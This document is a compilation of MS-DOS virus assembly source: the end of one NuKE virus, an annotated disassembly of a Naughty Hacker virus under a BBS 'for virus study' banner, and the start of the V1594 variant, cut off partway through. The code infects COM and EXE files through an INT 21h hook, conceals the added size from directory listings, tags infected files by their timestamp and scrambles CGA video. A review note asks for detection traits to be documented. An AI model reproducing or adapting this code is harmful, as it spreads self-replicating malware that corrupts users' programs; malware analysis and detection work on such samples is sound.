MOV AH,62H ; es:[di]
INT 21H ; Get the Program segment
; prefix...so we can infect it
DEC BX
MOV DS,BX
MOV BYTE PTR DS:DATA_15E,5AH
MOV DX,1E4H
XOR AX,AX ; Zero register
PUSH AX
POP DS
MOV AX,ES
SUB AX,10H
MOV ES,AX
CLI ; Disable interrupts
MOV DS:DATA_3E,DX ;
MOV WORD PTR DS:DATA_3E+2,ES
STI ; Enable interrupts
DEC BYTE PTR DS:DATA_14E ;
LOC_46:
POP SI
CMP WORD PTR CS:DATA_42E[SI],5A4DH
JNE LOC_47 ; Jump if not equal
POP DS
MOV AX,CS:DATA_46E[SI]
MOV BX,CS:DATA_45E[SI] ; all this shit is to restore
PUSH CS ; the program and continue
POP CX ; running the original
SUB CX,AX ; program...
ADD CX,BX
PUSH CX
PUSH WORD PTR CS:DATA_44E[SI]
PUSH DS
POP ES
CALL SUB_10
RETF
LOC_47:
POP AX
MOV AX,CS:DATA_42E[SI]
MOV WORD PTR CS:[100H],AX
MOV AX,CS:DATA_43E[SI]
MOV WORD PTR CS:[102H],AX
MOV AX,100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL SUB_10
RETN
SUB_11 ENDP
SEG_A ENDS
END START
Rock Steady [NuKE]
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
@@ -0,0 +1,558 @@
.model tiny
.code
.radix 16
ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
org 0100h
CALL EntryPoint ; Call virus entry point
; Here begin virus by himself
EntryPoint:
POP BP ; Restore in BP address of data area
PUSH BX ; Save BX
PUSH CX ; Save CX
PUSH ES ; Save ES
PUSH DS ; Save DS
CLC ; Clear carry flag
MOV AX,4B4Bh ; Load AX with self-check word
INT 21 ; Call int21
JC Install ; If virus is loaded CF==0
PUSH DS ; Save DS
PUSH CS ; Set DS point to PSP
POP DS ;
MOV SI,DI ; SI=DI= virus CODE begin
SUB SI,0003 ; include CALL in the beginning
ADD SI,BP ; Adjust different offsets
MOV CX,047Ch ; Compare virus code only
CLD ; Clear direction
REP CMPSB ; Repeat until equal
POP DS ; Restore DS
PUSH DS ; Set ES = DS
POP ES
JZ ReturnControl ; If virus -> return to file
Install:
MOV CS:[offset FunCounter+BP],3456 ; Load generation counter
MOV AX,DS ; Move PSP segment in AX
DEC AX ; Compute MCB of PSP
MOV DS,AX ; Set DS to MCB
SUB [0003],0050 ; "Steal" some memory
MOV AX,ES:[0002] ; ????
SUB AX,0050 ; ????
MOV ES:[0002],AX ;
PUSH AX ; Save new virus segment
SUB DI,DI ; DI=0
MOV SI,BP ; SI point to virus begin
SUB SI,0003 ; Adjust CALL in the beginning
MOV DS,DI ; DS set to 0
MOV BX,Offset int21handler ; Load BX with int 21 handler
XCHG BX,[0084] ; and set it in vector table
MOV CS:[BP+offset Int21off],bx ; Save old vector offset
XCHG AX,[0086] ; Set new int21 seg & get old segment
MOV CS:[BP+offset Int21seg],ax ; Save old vector segment
POP ES ; Set ES point to new virus seg
PUSH CS ; Set DS point to current virus seg (PSP)
POP DS ;
MOV CX,offset LastByte ; Will move all virus
REP MOVSB ; Move virus in hi memory (as Eddie)
MOV AX,4BB4h ; Int21 is grabbed by virus
INT 21 ; This SetUp virus function
ReturnControl:
POP DS ; Restore DS
POP ES ; Restore ES
CMP byte ptr CS:[BP+ComFlag],43 ; Check if host file is COM
JZ ReturnCOM ; If COM -> exit COM
ReturnEXE:
MOV AX,CS:[BP+First3] ; Load AX with old IP
MOV DX,CS:[BP+First3+2] ; Load AX with old CS
MOV CX,CS ; Load CX with current run segment
SUB CX,CS:[BP+06] ; Calculate PSP+10h
MOV DI,CX ; Save result in DI
ADD DX,CX ; In DX is now start segment
POP CX ; ???
POP BX ; ???
CLI ; Disable interrupts
ADD DI,CS:[BP+04]
MOV SS,DI
STI
DoReturn: ; 009B
PUSH DX ; Push entry segment
PUSH AX ; Push entry offset
SUB AX,AX ; Clear registers
SUB DX,DX ; Clear of AX may cause trouble
SUB BP,BP ; with several programs (as DISKCOPY)
SUB SI,SI ; AX must be saved on entry and restored
SUB DI,DI ;
RETF ; Return control to EXE file
ReturnCOM:
POP CX ; ???
POP BX ; ???
MOV AX,[BP+First3] ; Load AX with first 2 instr
MOV [0100],AX ; and restore them at file begin
MOV AX,[BP+First3+2] ; Load AX with second 2 instr
MOV [0102],AX ; and restore them at file begin
MOV AX,0100 ; Set AX to entry offset
MOV DX,CS ; Set DX to entry segment
JMP short DoReturn ; Go to return code
FindFirstNext:
PUSHF ; Save flags
CALL dword ptr CS:[offset Dos21off] ; Call DOS
PUSH BX ; Save rezult of searching
PUSH ES
PUSH SI
PUSH AX
MOV SI,DX ; DS:SI point to FCB with search argument
CMP byte ptr [SI],0FFh ; Check for Extended FCB
JNZ NoDirCommand ; If FCB not extended then command is not DIR
MOV AH,2Fh ; Get DTA address; Result of search is in DTA
INT 21
MOV AX,ES:[BX+1Eh] ; Load file time to AX
AND AX,001Fh ; Mask seconds
CMP AX,001Fh ; Check if file seconds are 62
JNZ NoDirCommand ; If seconds!=62 -> file not infected
CMP ES:[BX+26h],0000 ; Check file size, hi byte
JNZ AdjustSize ; If file bigger than 64K -> immediate adjust
CMP ES:[BX+24h],offset LastCode ; Check low byte of file size
JC NoDirCommand ; If file is less than virus -> skip adjust
AdjustSize:
SUB ES:[BX+24h],offset LastCode ; Decrement file size with virus size
SBB ES:[BX+26h],0000 ; Decrement hi byte of size if need
NoDirCommand:
POP AX ; Restore registers
POP SI
POP ES
POP BX
IRET ; Return to caller
HereIam:
PUSH CS ; If AX==4B4B -> so virus call me
POP ES ; Set ES to virus segment
MOV DI,000C ; Set DI to virus code begin
IRET ; Return to caller
Int21handler:
CMP AH,11h ; If function is FindFirst
JZ FindFirstNext ; If so -> will adjust file size
CMP AH,12h ; If function is FindNext
JZ FindFirstNext ; If so -> will adjust file size
CMP AX,4B4Bh ; If AX==4B4B -> Identification
JZ HereIam ; function
CMP AX,4BB4h ; Setup function
JNZ Continue ; Continue checking of AH
JMP SetUp
Continue:
PUSH AX ; Save important registers
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH BP
PUSH DS
PUSH ES
CMP AH,3Eh ; If function CLOSE file handle
JZ CloseFile ;
CMP AX,4B00h ; If function is EXEC file
MOV AH,3Dh ; If so set AH to OPEN function
JZ Infect ; and infect file
ErrorProcess:
MOV AX,CS:[offset FunCounter] ; Load nomer pored na function
CMP AX,0000 ; If counter is != 0
JNZ AdjustFunCount ; then only decrease counter
JMP VideoFuck ; else go to video fuck
AdjustFunCount:
DEC AX
MOV CS:[04A0h],AX
EndInt21:
POP ES ; Restore important registers
POP DS
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
JMP dword ptr CS:[offset Int21off] ; Jump to DOS
DB 9A ; ??????
CloseFile:
MOV AH,45
Infect:
CALL CallDOS ; Call DOS int 21
JC ErrorProcess ; If error -> Stop processing
MOV BP,AX ; Save file handle in BP
MOV AX,3508 ; Get timer interrupt
CALL CallDOS
MOV CS:[offset TimerOff],BX ; and save it in variable
MOV CS:[offset TimerSeg],ES
PUSH BX ; and to stack
PUSH ES
MOV AL,21 ; Get in21
CALL CallDOS
PUSH BX ; and save it on stack
PUSH ES
MOV AL,24 ; Get critical error int
CALL CallDOS
PUSH BX ; and store it on stack
PUSH ES
MOV AL,13 ; Get int 13 (disk I/O)
CALL CallDOS
PUSH BX ; and save it on stack
PUSH ES
MOV AH,25 ; Now he will SET vectors
LDS DX,dword ptr CS:[offset Int13off] ; Load int13 bios address
CALL CallDOS ; Set it in vector table
MOV AL,21
LDS DX,dword ptr CS:[offset Dos21off] ; Load int21 dos address
CALL CallDOS ; Set in vector table
MOV AL,24 ; Will set critical error handler
PUSH CS
POP DS ; Set DS point to vurus segment
MOV DX,offset CriticalError ; Load its own critical handler
INT 21 ; Set in vector table
MOV AL,08 ; Set new timer
MOV DX,offset TimerHandler ; Load its own timer
INT 21 ; Set in vector table
MOV BX,BP ; Restore file handle from BP to BX
PUSH BX ; Save handle on stack
MOV AX,1220 ; Get handle table number
CALL CallInt2F ; Via int2F (undocumented)
MOV BL,ES:[DI] ; Load table number in BL
MOV AX,1216 ; Get table address
CALL CallInt2F ; Via int2F (undocumented)
POP BX ; Restore file handle
ADD DI,0011 ; ES:DI point to file size
MOV byte ptr ES:[DI-0Fh],02 ; Set file open mode (3Dxx) to Read/Write
MOV AX,ES:[DI] ; Load DX:AX with file size
MOV DX,ES:[DI+02] ;
CMP DX,0000 ; Check if file is less than 64k
JNZ BigEnough ; If less
CMP AX,offset LastCode ; Then check if file is less than virus
JNC BigEnough ; If file is larger than virus -> fuck it
JMP SkipFile ; else skip file
BigEnough:
MOV [offset FileSizeLow],AX ; Save file size in variables
MOV [offset FileSizeHi],DX
SUB AX,offset VirusAuthor-offset EndAuthor ; Decrease file size with sign size
SBB DX,0000 ;
MOV ES:[DI+04],AX ; Set current file position to point
MOV ES:[DI+06],DX ; Virus sign
PUSH DI ; Save table handle table address
PUSH ES ;
MOV AH,3F ; Will read from file
MOV CX,offset EndAuthor-offset VirusAuthor
MOV DX,offset LastByte ; Load DS:DX point AFTER virus
MOV DI,DX ; DI point this area either
INT 21 ; Read file
MOV SI,Offset VirusAuthor ; DS:SI point virus sign
MOV CX,offset EndAuthor-offset VirusAuthor ; Load CX sign size
PUSH CS ; ES:DI point to readed byte
POP ES ;
REP CMPSB ; Compare virus sign with readed bytes
POP ES ; Restore handle table address
POP DI ;
JNZ CleanFile ; If not equal -> file is clean
JMP SkipFile ; Else file infected -> skip it
CleanFile: MOV ES:[DI+04],0000 ; Set file pointer to 0L
MOV ES:[DI+06],0000
MOV AH,3F ; Will read EXE header
MOV CX,001B ; Size of EXE header
MOV DX,offset LastByte ; Read in buffer AFTER virus
MOV SI,DX ; Set DS:SI point to readed header
INT 21 ; Read header
JNC NoErrorHeader ; If no error in read -> go ahead
JMP SkipFile ; If error occur -> skip file
NoErrorHeader: CMP ES:[DI+18],4D4F ; Check in table if file is ?OM
JNZ NoComFile
JMP InfectCOM
NoComFile: CMP ES:[DI+18],4558 ; Check for ?XE file
JZ CheckForEXE ; If so -> infect it
JMP SkipFile ; Else skip file
CheckForEXE: CMP ES:[DI+17],45 ; Check if file is realy an EXE-named
JZ CheckEXEsign ; If so -> check for MZ,ZM
JMP SkipFile ; Else skip file
CheckEXEsign: CMP [SI],5A4Dh ; Check for MZ
JZ InfectEXE ; If so -> infect file
CMP [SI],4D5Ah ; Check for ZM
JZ InfectEXE ; If so -> infect file
JMP SkipFile ; Otherwise -> skip file
InfectEXE: MOV byte ptr [ComFlag],45h ; Set file type flag to EXE
MOV AX,[SI+0Eh] ; Load AX with EXE file SS
MOV [SSegment],AX ; and save it
MOV AX,[SI+14h] ; Load AX with EXE header IP
MOV [IPointer],AX ; and save it
MOV AX,[SI+16h] ; Load AX with EXE header CS
MOV [CSegment],AX ; And save it
MOV DX,offset LastCode ; Load DX with virus CODE size
PUSH DX ; Save it to stack
MOV CX,9h ; Compute virus size in
SHR DX,CL ; 512 pages
ADD [SI+04h],DX ; Increase EXE file header size field
; with virus pages
POP DX ; Restore virus size in DX
AND DX,01FFh ; Compute reminder from VirusSize/512
ADD DX,[SI+02] ; Save value in EXE header
CMP DX,0200 ; Check virus reminder
JL NoAdjustRem ; If less than 512 -> no adjust
SUB DX,0200 ; Else decrease reminder
INC word ptr [SI+04] ; Increase EXE header page count
NoAdjustRem:
MOV [SI+02],DX ; Save correct reminder in EXE header
MOV AX,[SI+08] ; Load AX with file size in paragraphs
SUB DX,DX ; Set DX to Zero
CALL LongMultiple16 ; Get DX:AX file size in bytes
SUB [offset FileSizeLow],AX ; Correct saved file size
SBB [offset FileSizeHi],DX
MOV AX,[FileSizeLow] ; Load DX:AX with corrected file size
MOV DX,[offset FileSizeHi]
CALL LongMultiple16 ; DX:AX *= 0x10
MOV CX,0008 ; Calculate new entry CS:IP
SHL DX,CL ; DX/=0x100
MOV CX,0004
SHR AX,CL ; AX/=0x10
MOV [SI+14],AX ; Set entry CS:IP to EXE header
MOV [SI+16],DX
MOV [NewCS],DX ; Save new entry CS
ADD DX,0200 ; Calculate new entry SS
MOV [SI+0E],DX ; Store it to EXE header
DoInfect:
MOV ES:[DI+04],0000 ; Set file pointer to 0L
MOV ES:[DI+06],0000
PUSH ES:[DI-02] ; Save file date/time on stack
PUSH ES:[DI-04]
SUB CX,CX ; Set CX to 0
XCHG CX,ES:[DI-0Dh] ; Load CX file attrib/set file attrib to 0
PUSH CX ; Save file attrib to stack
MOV AH,40 ; Write file
MOV DX,offset LastByte ; EXE header
MOV CX,001B ; Rewrite modified EXE header
INT 21 ; Do write
JC BadWrite ; If error skip file
MOV AX,ES:[DI] ; Set file pointer
MOV ES:[DI+04],AX
MOV AX,ES:[DI+02] ; to end of file
MOV ES:[DI+06],AX ;
MOV AH,40 ; Will write
SUB DX,DX ; Virus offset
MOV CX,offset LastCode ; Virus size
INT 21 ; Write virus to EXE file
BadWrite:
POP CX ; Restore file attrib from stack
MOV ES:[DI-0Dh],CX ; Set attrib of file
POP CX ; Restore file date/time from stack
POP DX
OR byte ptr ES:[DI-0Bh],40 ; Set DO NOT UPDATE TIME flag in table
JC NoFuckTime ; If write error -> Set normal time
OR CX,001F ; Else set file seconds to 62
NoFuckTime:
MOV AX,5701 ; Set file date/time
INT 21 ; Via int21
SkipFile:
MOV AH,3E ; CloseFile
INT 21
OR byte ptr ES:[DI-0Ch],40 ; ????
SUB AX,AX ; Set DS to 0
MOV DS,AX
POP AX ; Restore int 13 seg
MOV [004E],AX ; Restore vector 13 seg
POP AX ; Restore int 13 off
MOV [004C],AX ; Restore vector 13 off
POP AX ; Restore int 24 seg
MOV [0092],AX ; Restore vector 24 seg
POP AX ; Restore int 24 off
MOV [0090],AX ; Restore vector 24 off
POP AX ; Restore int 21 seg
MOV [0086],AX ; Restore vector 21 seg
POP AX ; Restore int 21 off
MOV [0084],AX ; Restore vector 21 off
POP AX ; Restore int 8 seg
MOV [0022],AX ; Restore vector 8 seg
POP AX ; Restore int 8 off
MOV [0020],AX ; Restore vector 0 off
JMP ErrorProcess ; Update counter
InfectCom:
TEST byte ptr ES:[DI-0Dh],04 ; Check for SYSTEM file
JNZ OkComFile ; If file IS system -> Damage file ?????
PUSH SI ; Save buffer offset
CMP ES:[DI+17],43 ; Check if file ext begin with 'C'
JNZ OkComFile ; If no -> damage file
MOV byte ptr [ComFlag],43 ; Set file type flag to COM
LODSW ; Load first 2 bytes of file
MOV CS:[First3],AX ; And save them
LODSW ; Load seconf 2 bytes of file
MOV CS:[First3+2],AX ; And save them
MOV AX,ES:[DI] ; Load AX with file size
CMP AX,0FA76h ; Check file size
POP SI ; Restore buffer offset
JC OkComFile ; If file is less than 64118 bytes -> OK infect
JMP short SkipFile ; else skip file
OkComFile:
SUB AX,0003 ; Calculate jump argument
MOV byte ptr [SI],0E9h ; Set first instruction to near JMP
MOV [SI+01],AX ; Store JMP argument
JMP DoInfect ; Go write buffer
LongMultiple16:
PUSH CX ; Save CX
MOV CX,0004 ; Will repeat 4 times
DoMult:
SHL AX,1 ; Mult DX:AX * 2
RCL DX,1 ;
LOOP DoMult ; Repeat 4 times -> 2^4 = 16
POP CX ; Restore CX
RET ; Return to caller
SetUp:
MOV AH,52 ; Get DOS's table of table address
INT 21 ; in ES:BX
MOV CS:[Offset TableSegment],es ; Save table segment
; Virus treat this segment as DOS segment
; He assume int21 seg == to DOS segment
; That's why virus will fail on DOS 5.X
CLI ; Disable interrupts
SUB AX,AX ; Set AX to 0
MOV DS,AX ; Set DS point to interrupt vectors
MOV [0004],offset Debugger ; Set vector 1 (trap) offset
MOV [0006],CS ; ; Set vector 1 (trap) seg
MOV AX,[00BC] ; Load int2F off
MOV CS:[offset Int2Foff],AX ; and save it
MOV AX,[00BE] ; Load int2F seg
MOV CS:[offset Int2Fseg],AX ; and save it
STI ; Enable interrupts
PUSHF ; Save flags
PUSHF ; Save flags
POP AX ; Get flags in AX
OR AX,0100 ; Set TF to 1 (trace mode)
PUSH AX ; Put flags back to stack
POPF ; Begin trace
SUB AX,AX ; AX = 0
DEC AH ; AX = FF00 ???
CALL dword ptr [0084] ; Call DOS (trace mode active)
MOV SI,0004 ; SI = 4
MOV DS,SI ; DS = SI = 4
MOV AH,30 ; Get DOS version
INT 21 ; Via int21
CMP AX,1E03 ; Check DOS 3.30
LES AX,[SI+08] ; Load ES:AX with int13 address
JB OkInt13 ; If DOS vers < 3.30 -> ignore BIOS address load/check
LES AX,[0770+SI] ; then load ES:DX with BIOS address of int13
; simulate int2F, AH=13
MOV BX,ES ; BX:AX int13 BIOS address
CMP BX,0C800h ; If int13 seg >= C800
JAE OkInt13 ; Then address is in BIOS, all OK
CLI ; else HALT system
HLT
OkInt13:
MOV CS:[offset Int13off],AX ; Save in13 address
MOV CS:[offset Int13seg],ES
IRET ; Return to caller, setup complete
Debugger:
PUSH BP ; Save BP
MOV BP,SP ; BP point to stack top
PUSH BX ; Save BX
MOV BX,CS:[offset TableSegment] ; Load BX with DOS segment
CMP SS:[BP+04],BX ; Check debugged address
JNZ ContinueDebug ; If not in DOS -> continue
MOV BX,SS:[BP+02] ; else load BX with int21 off
MOV CS:[offset Dos21off],BX ; and save it
AND SS:[BP+06],0FEFFh ; Clear trap flag
ContinueDebug:
POP BX ; Restore BX
POP BP ; Restore BP
IRET ; Continue trace if require or
; continue int21 execution without trace
; Next subroutine fuck you CGA display (don't affect EGA).
; Fucking result could be fix by dos MODE command
VideoFuck:
MOV DX,03D4h ; Select CGA register selector
MOV AL,02 ; Select CRT register 2 (horiz sync)
OUT DX,AL ; Do selection
MOV AL,0FFh ; New sync value
MOV DX,03D5h ; Select CGA register value writer
; This could be INC DX; That save 1 byte
OUT DX,AL ; Fuck horiz sync
JMP EndInt21 ; Terminate int21 request
CallDOS:
PUSHF ; Save flags
CALL dword ptr CS:[offset Dos21off] ; Call ORIGINAL int21
RET ; Return to caller
CallInt2F:
PUSHF ; Save flags
CALL dword ptr CS:[offset Int2Foff] ; Call SAVED int2F
RET ; Return to caller
TimerHandler:
PUSHF ; Save flags
CALL dword ptr CS:[offset TimerOff] ; Call original timer
PUSH AX ; Save AX
PUSH DS ; Save DS
SUB AX,AX ; Set DS to interrupt table
MOV DS,AX
CLI ; Disable interrupts
MOV AX,CS:[offset Int13off] ; Restore int13 address
MOV [004C],AX
MOV AX,CS:[offset Int13seg]
MOV [004E],AX
MOV [0020],offset TimerHandler ; Set int8
MOV [0022],CS
MOV AX,CS:[offset Dos21off] ; Restore int21 address
MOV [0084],AX
MOV AX,CS:[offset TableSegment]
MOV [0086],AX
MOV AX,offset CriticalError ; Set int24
MOV [0090],AX
MOV [0092],CS
STI ; Enable interrupts
POP DS ; Restore DS
POP AX ; Restore AX
IRET ; Terminate timing
CriticalError:
MOV AL,03 ; If critical error
IRET ; then simulate Ignore
VirusAuthor:
db 'Sofia,Feb '
db 27h
db '91 Naughty Hacker.' ; Replace this string with HORSE
EndAuthor:
LastCode label byte ; This is virus in file
Int21off: DW 0 ; Variable area
Int21seg: DW 0 ; NOT writed in file
Int2Foff: DW 0
Int2Fseg: DW 0
TimerOff: DW 0
TimerSeg: DW 0
Int13off: DW 0
Int13seg: DW 0
Dos21off: DW 0
TableSegment: DW 0
FileSizeLow: DW 0
FileSizeHi: dw 0
FunCounter: dw 0 ; Executed function counter
LastByte: label byte ; Memory size of virus
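Review bot: The listing has no header comment collecting the traits an analyst or detection author needs, although each is visible in the code: the residency query `AX=4B4Bh` on INT 21h answered at `HereIam`, the timestamp seconds field forced to 1Fh (62 s) at `NoFuckTime`, and the `VirusAuthor` string that the `Infect` path reads back and compares before treating a file as clean. A short header listing these three would make the file usable as a reference. It should also say that `FindFirstNext` subtracts `offset LastCode` from the size reported for extended-FCB searches on marked files, so directory sizes on a resident system cannot be trusted. Two existing comments are also wrong and should read `; Load DX with old CS` on the `MOV DX,CS:[BP+First3+2]` line in `ReturnEXE` and `; Restore vector 8 off` on the `MOV [0020],AX` line in `SkipFile`.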
@@ -0,0 +1,958 @@
.radix 16
;*********************************
;* The Naughty Hacker's virus *
;*VERSION 3.1 (And not the last.)*
;* ( V1594 ) *
;* Finished on the 10.04.1991 *
;* *
;* Glad to meet you friend! *
;* *
;*********************************
;
; "It's hard to find a black cat in a dark room, especially if it's not there."
;
; °¥¤ ¢ ± ±²®¨ ®°¨£¨­ «­¨¿ ²¥ª±² ­  V1594 ( ª® ¬®¦¥ ² ª  ¤  ª ¦¥ !@!?!).
; €¢²®°º² (Š®­¿) ¯°¥¤¢ °¨²¥«­® ¯°¥¤³¯°¥¦¤ ¢ ,·¥ ­¥ ¦¥« ¥ ²®§¨ ²¥ª±² ¤  ¡º¤¥
; ¯°®¬¥­¿­ ¯® ­¨ª ªº¢ ­ ·¨­, ­®  ª® ¦¥« ¥²¥ ¤  £® ³±º¢º°¸¥­±²¢ ²¥ ¬®¦¥ ¤ 
; ­ ¯° ¢¨²¥ ²®¢  ­ ¯º«­® ±¢®¡®¤­® ¯°¨ ¥¤¨­±²¢¥­®²® ³±«®¢¨¥, ·¥ ¢ ¯®«³·¥­ ² 
; ­®¢  ¢¥°±¨¿ ­¿¬  ¤  ¨¬  ­¨ª ª¢¨ ° §°³¸¨²¥«­¨ ´³­ª¶¨¨.
; €¢²®°º² ­¥ ¯®¥¬  ­¨ª ª¢  ®²£®¢®°­®±² §  ¹¥²¨ ¯°¨·¨­¥­¨ ®² ‚ˆ“‘€ ......
;
; „  ±¥ ª®¬¯¨«¨°  ­  TURBO ASSEMBLER Ver 1.03B.  ª  ¯®«³·¥­¨¿ ª®¤ ¥ £®²®¢
; §  ±² °²¨° ­¥ ¨ ....
;
; ®§¤° ¢¨ ¤® ¢±¨·ª¨ VIRUSWRITERS !
;
;
; To be continued ...
;
call Start_Virus
mov dx,offset Hellomsg
mov ah,9
int 21
int 20
Hellomsg db 0a,0dh,7,'HI WORLD,GIVE ME COMMAND.COM !!!',0a,0dh,7,'$'
Virus_lenght equ endcode-adjust
alllen equ buffer-adjust
adjust label word
IP_save label word
First_3 Label Byte
;For .COM file here stores
ret
nop
nop
CS_save dw ? ;The first 3 bytes
SP_save dw ?
SS_save dw 0FFFF ;0FFFF For COM files
signature:
db 'N.Hacker' ;It's me the HORSE !!!
date_stamp:
dd 10041991 ;10.04.1991
Run_The_Program:
pop ds ;Restore saved ds,es,ax
pop es ;ds=es=PSP
pop ax
cmp cs:[bp+SS_save-adjust],0FFFF ;Run the infected program
je Run_COM_File
mov ax,ds ;Calculate load segment
add ax,10
mov bx,ax
add ax,cs:[bp+CS_save-adjust] ;Calculate CS value
add bx,cs:[bp+SS_save-adjust] ;Calculate SS value
mov ss,bx ;Run .EXE program
mov sp,word ptr cs:[bp+SP_save-adjust]
push ax
push word ptr cs:[bp+IP_save-adjust]
retf
Run_COM_File:
mov di,100
mov si,bp
movsb ;Restore the first 3 bytes
movsw ;Run .COM program
mov bx,100
push bx
sub bh,bh
ret
;*******************************************************************
; *
; This is the program entry.... *
; *
;*******************************************************************
Start_Virus:
call Get_IP ;This is to get the IP value.
Get_IP:
pop bp ;Get it in BP.
sub bp,Get_IP-adjust ;adjust BP point to the begining
cld ;Clear direction flag
push ax ;Save some registres
push es
push ds
mov es,[2] ;get last segment
mov di,Run_The_Program-adjust ;(last segment=segment of virus)
push ds
push cs
pop ds
mov si,di
add si,bp
mov cx,endcode-Run_The_Program
rep cmpsb ;check if virus is in memory
pop ds
push ds
pop es
je Run_The_Program ;If so then run the program
mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save
mov ax,ds
dec ax
mov ds,ax ;ds=MCB
sub word ptr [3],80 ;Set block size
sub word ptr [12],80 ;Set last segment
mov es,[12] ;steal some memory (2K)
push cs
pop ds
sub di,di
mov si,bp ;prepare to move in high mem
mov cx,alllen ;will move virus+variables
rep movsb ;copy there
push cs
mov ax,Run_The_Program-adjust
add ax,bp
push ax
push es
mov ax,offset Set_Vectors-adjust ;Set vectors
push ax
retf
Find_First_Next:
call Call_Original_INT_21h ;fuck when do the dir command
push bx
push es
push ax
or al,al
jnz Go_Out_ ;if error
mov ah,2f ;get DTA address
int 21
mov al,byte ptr es:[bx+30d] ;Seconds in al
and al,31d ;Mask seconds
cmp al,60d/2 ;Seconds=60?
jne Go_Out_
mov ax,es:[bx+36d]
mov dx,es:[bx+38d] ;Check File size
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_
Adjust_Size:
sub es:[bx+28d+7+1],Virus_lenght ;Adjust size
sbb es:[bx+28d+2+7+1],0
Go_Out_:
pop ax
pop es ;Return to caller
pop bx
iret
Find_First_Next1:
call Call_Original_INT_21h
pushf
push ax
push bx ;fuck again
push es
jc Go_Out_1
mov ah,2f
int 21
mov al,es:[bx+22d]
and al,31d
cmp al,60d/2
jne Go_Out_1
mov ax,es:[bx+26d]
mov dx,es:[bx+28d]
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_1
Adjust_Size1:
sub es:[bx+26d],Virus_lenght
sbb es:[bx+28d],0
Go_Out_1:
pop es
pop bx
pop ax ; Dummy proc far
popf ; ret 2
db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long...
;*************************************
; *
; Int 21 entry point. *
; *
;*************************************
INT_21h_Entry_Point:
cmp ah,11
je Find_First_Next ;Find First Next (old)
cmp ah,12
je Find_First_Next
cmp ah,4e ;Find First Next (new)
je Find_First_Next1
cmp ah,4f
je Find_First_Next1
cmp ah,6ch
jne not_create ;Create (4.X)
test bl,1
jz not_create
jnz create
not_create:
cmp ah,3ch ;Create (3.X)
je create
cmp ah,5bh
je create
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov byte ptr cs:[function-adjust],ah
cmp ah,6ch ;Open (4.X)
je create_
cmp ah,3e ;Close
je close_
cmp ax,4b00 ;Exec
je Function_4Bh
cmp ah,17 ;Rename (old)
je ren_FCB
cmp ah,56 ;Rename (new)
je Function_4Bh
cmp ah,43 ;Change attributes
je Function_4Bh
cmp ah,3dh ;Open (3.X)
je open
Return_Control:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
Go_out:
jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21
create_:
or bl,bl ;Create file?
jnz Return_Control
mov dx,si
jmp Function_4Bh
ren_FCB:
cld
inc dx
mov si,dx
mov di,offset buffer-adjust
push di
push cs
pop es ;Convert FCB format Fname into ASCIIZ string
mov cx,8
rep movsb
mov al,'.'
stosb
mov cx,3
rep movsb
sub al,al
stosb
pop dx
push cs
pop ds
jmp Function_4Bh
create:
; cmp word ptr cs:[handle-adjust],0ffff
; jne Go_out
call Call_Original_INT_21h
jc Error
mov word ptr cs:[handle-adjust],ax
jnc Exit_
Error:
mov word ptr cs:[handle-adjust],0ffff ;Useless
Exit_:
; retf 2
db 0ca,2,0
close_:
cmp word ptr cs:[handle-adjust],0ffff
je Return_Control
cmp bx,word ptr cs:[handle-adjust]
jne Return_Control
mov ah,45
call Infect_It
mov word ptr cs:[handle-adjust],0ffff
jmp Return_Control
Function_4Bh:
mov ax,3d00h
open:
call Infect_It
jmp Return_Control
;******************************************
; *
; This infects the programs... *
; *
;******************************************
Infect_It:
call Call_Original_INT_21h ;this is the infecting part
jnc No_error
ret
No_error:
xchg ax,bp
mov byte ptr cs:[flag-adjust],0
mov ah,54
call Call_Original_INT_21h
mov byte ptr cs:[veri-adjust],al
cmp al,1 ;Switch off verify...
jne Go_On_Setting
mov ax,2e00
call Call_Original_INT_21h
Go_On_Setting:
push cs
push cs
pop ds
pop es
mov dx,offset DOS_13h-adjust
mov bx,dx ;Set New DOS int 13h
mov ah,13
call Call_Original_INT_2Fh
mov ax,3513
call Call_Original_INT_21h
push bx
push es
mov word ptr cs:[current_13h-adjust],bx
mov word ptr cs:[current_13h-adjust+2],es
mov ah,25
